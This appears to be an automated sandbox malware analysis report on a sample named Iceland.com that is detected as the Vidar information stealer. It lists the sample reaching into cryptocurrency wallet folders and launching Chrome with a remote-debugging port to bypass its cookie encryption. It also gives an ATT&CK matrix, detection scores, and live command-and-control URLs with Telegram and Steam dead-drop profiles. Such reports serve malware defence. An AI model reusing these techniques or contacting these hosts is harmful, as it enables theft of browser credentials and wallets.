Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\

Source: Iceland.com	Binary or memory string: WIN_81
Source: Iceland.com	Binary or memory string: WIN_XP
Source: Dedicated.11.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Iceland.com	Binary or memory string: WIN_XPe
Source: Iceland.com	Binary or memory string: WIN_VISTA
Source: Iceland.com	Binary or memory string: WIN_7
Source: Iceland.com	Binary or memory string: WIN_8

Source: Yara match	File source: 00000015.00000002.3335415004.000000000177F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Iceland.com PID: 2800, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 21.2.Iceland.com.42f0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.3337432353.0000000003FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2446949939.000000000171B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3335415004.000000000177F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2446545610.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2446576253.0000000004015000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3341880599.00000000042F1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000003.2446692096.00000000042F3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Iceland.com PID: 2800, type: MEMORYSTR

Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00992263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		21_2_00992263
Source: C:\Users\user\AppData\Local\Temp\314782\Iceland.com	Code function: 21_2_00991C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		21_2_00991C61

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	1 Windows Management Instrumentation	1 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	2 Valid Accounts	1 Extra Window Memory Injection	2 Obfuscated Files or Information	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Registry Run Keys / Startup Folder	2 Valid Accounts	1 DLL Side-Loading	NTDS	36 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	1 Services File Permissions Weakness	21 Access Token Manipulation	1 Extra Window Memory Injection	LSA Secrets	1 Query Registry	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	12 Process Injection	111 Masquerading	Cached Domain Credentials	331 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	1 Registry Run Keys / Startup Folder	2 Valid Accounts	DCSync	131 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	1 Services File Permissions Weakness	131 Virtualization/Sandbox Evasion	Proc Filesystem	4 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Services File Permissions Weakness	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
installer.bat	11%	ReversingLabs	Win32.Trojan.Boxter

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\314782\Iceland.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\yoda.exe	55%	ReversingLabs	Win32.Ransomware.Vidar

Source	Detection	Scanner	Label
https://bijutr.shop/ngs	100%	Avira URL Cloud	malware
https://bijutr.shop/ocaC	100%	Avira URL Cloud	malware
https://bijutr.shopbf8eaf1819b7	0%	Avira URL Cloud	safe
https://bijutr.shopsh;	0%	Avira URL Cloud	safe
https://bijutr.shop/URR	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bijutr.shop	188.245.216.205	true	false	high
chrome.cloudflare-dns.com	172.64.41.3	true	false	high
t.me	149.154.167.99	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
sb.scorecardresearch.com	18.165.220.106	true	false	high
www.google.com	172.217.21.36	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
googlehosted.l.googleusercontent.com	142.250.181.65	true	false	high
clients2.googleusercontent.com	unknown	unknown	false	high
bzib.nelreports.net	unknown	unknown	false	high
assets.msn.com	unknown	unknown	false	high
pXJlKZlafjPwNXLLYZe.pXJlKZlafjPwNXLLYZe	unknown	unknown	false	unknown
c.msn.com	unknown	unknown	false	high
ntp.msn.com	unknown	unknown	false	high
api.msn.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279851726&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw	false	high
https://browser.events.data.msn.com/OneCollector/1.0?cors=true&content-type=application/x-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-3.2.8&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1735279845645&time-delta-to-apply-millis=use-collector-delta&w=0&anoncknm=app_anon&NoResponseBody=true	false	high
https://steamcommunity.com/profiles/76561199809363512	false	high
https://t.me/k04ael	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b	chrome.exe, 00000018.00000002.2724481612.000054DC007C4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
http://polymer.github.io/AUTHORS.txt	chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC01018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644559836.000054DC010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644472845.000054DC010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645937843.000054DC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645968432.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644663261.000054DC00FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725617060.000054DC009F3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644831779.000054DC010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645910322.000054DC00D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644594327.000054DC0112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/	chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	false		high
http://unisolated.invalid/	chrome.exe, 00000018.00000002.2726026574.000054DC00A40000.00000004.00000800.00020000.00000000.sdmp	false		high
https://photos.google.com?referrer=CHROME_NTP	chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive.google.com/?lfhs=2ation.Result	chrome.exe, 00000018.00000002.2734607653.000054DC01330000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.google.com/widget/callout?eom=1	chrome.exe, 00000018.00000003.2687341680.000054DC02AFC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2686937431.000054DC02B64000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6929	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bijutr.shop/ngs	Iceland.com, 00000015.00000002.3338270590.00000000040D4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://docs.googl0	chrome.exe, 00000018.00000002.2722535433.000054DC0030C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://drive-daily-2.corp.google.com/	chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	false		high
http://polymer.github.io/PATENTS.txt	chrome.exe, 00000018.00000003.2646237242.000054DC0040C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646002409.000054DC01018000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644559836.000054DC010DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644472845.000054DC010CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645937843.000054DC0100C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645968432.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644663261.000054DC00FC0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646350603.000054DC0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2725617060.000054DC009F3000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644831779.000054DC010F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2645910322.000054DC00D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644594327.000054DC0112C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2646465243.000054DC0126C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.ver)	svchost.exe, 00000019.00000002.3340409321.000002891D400000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/X	Iceland.com, 00000015.00000002.3330766347.00000000009E5000.00000002.00000001.01000000.0000000A.sdmp, Iceland.com.12.dr, Dedicated.11.dr	false		high
https://issuetracker.google.com/161903006	msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Iceland.com, 00000015.00000002.3340869698.00000000042A2000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, 7G4EUK.21.dr	false		high
https://drive-daily-5.corp.google.com/	chrome.exe, 00000018.00000003.2636152248.000054DC004E8000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.37.dr	false		high
https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actions	chrome.exe, 00000018.00000002.2724481612.000054DC007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723167042.000054DC00544000.00000004.00000800.00020000.00000000.sdmp	false		high
https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacy	chrome.exe, 00000018.00000002.2731827074.000054DC00FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2722965164.000054DC004C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2724440969.000054DC007A0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/v1/issuetoken	msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ogs.goog	chrome.exe, 00000018.00000002.2732625729.000054DC01082000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://m.google.com/devicemanagement/data/api	chrome.exe, 00000018.00000002.2722150471.000054DC0020C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/reauth/v1beta/users/	msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/document/doglT	chrome.exe, 00000018.00000002.2721223946.000054DC0001C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.google.com/presentation/u/0/create?usp=chrome_actions	chrome.exe, 00000018.00000002.2724481612.000054DC007C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2732336841.000054DC01064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2723167042.000054DC00544000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/LogoutYxAB	msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bijutr.shop/ocaC	Iceland.com, 00000015.00000002.3338270590.00000000040D4000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://drive-daily-4.c	chrome.exe, 00000018.00000002.2722535433.000054DC0030C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	Iceland.com, 00000015.00000002.3338270590.0000000004097000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3338924888.0000000004205000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3345430738.00000000069D0000.00000004.00000800.00020000.00000000.sdmp, DJMYU3.21.dr	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	Iceland.com, 00000015.00000002.3338270590.0000000004097000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3338924888.0000000004205000.00000004.00000800.00020000.00000000.sdmp, Iceland.com, 00000015.00000002.3345430738.00000000069D0000.00000004.00000800.00020000.00000000.sdmp, DJMYU3.21.dr	false		high
https://drive.google.com/?lfhs=2dT	chrome.exe, 00000018.00000002.2734607653.000054DC01330000.00000004.00000800.00020000.00000000.sdmp	false		high
https://publickeyservice.pa.gcp.privacysandboxservices.com	chrome.exe, 00000018.00000003.2675521289.000054DC022C0000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/RotateBoundCookies	msedge.exe, 0000001C.00000003.2778651450.00003D1802474000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2778137040.00003D1802470000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000003.2887233804.0000469C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978887050.00005E340026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978784390.00005E3400268000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000024.00000003.2978711761.00005E3400264000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://t.m	Iceland.com, 00000015.00000003.2446436939.0000000001797000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446404476.00000000016F7000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446667897.0000000001797000.00000004.00000020.00020000.00000000.sdmp, Iceland.com, 00000015.00000003.2446622955.00000000017B0000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	Iceland.com, 00000015.00000002.3345430738.00000000069D0000.00000004.00000800.00020000.00000000.sdmp, DJMYU3.21.dr	false		high
http://anglebug.com/3862	chrome.exe, 00000018.00000003.2637977901.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639533143.000054DC0039C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639571794.000054DC00764000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000002.2728668963.000054DC00CB8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779005853.00003D1802568000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 0000001C.00000003.2779628805.00003D1802554000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/async/newtab_b?f	chrome.exe, 00000018.00000002.2721408724.000054DC00080000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstoreLDDiscover	chrome.exe, 00000018.00000003.2643017611.000054DC00F10000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2639881206.000054DC00D30000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2647664274.000054DC00D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2644291367.000054DC00D48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000018.00000003.2641815690.000054DC00F10000.00000004.00000800.00020000.00000000.sdmp	false		high
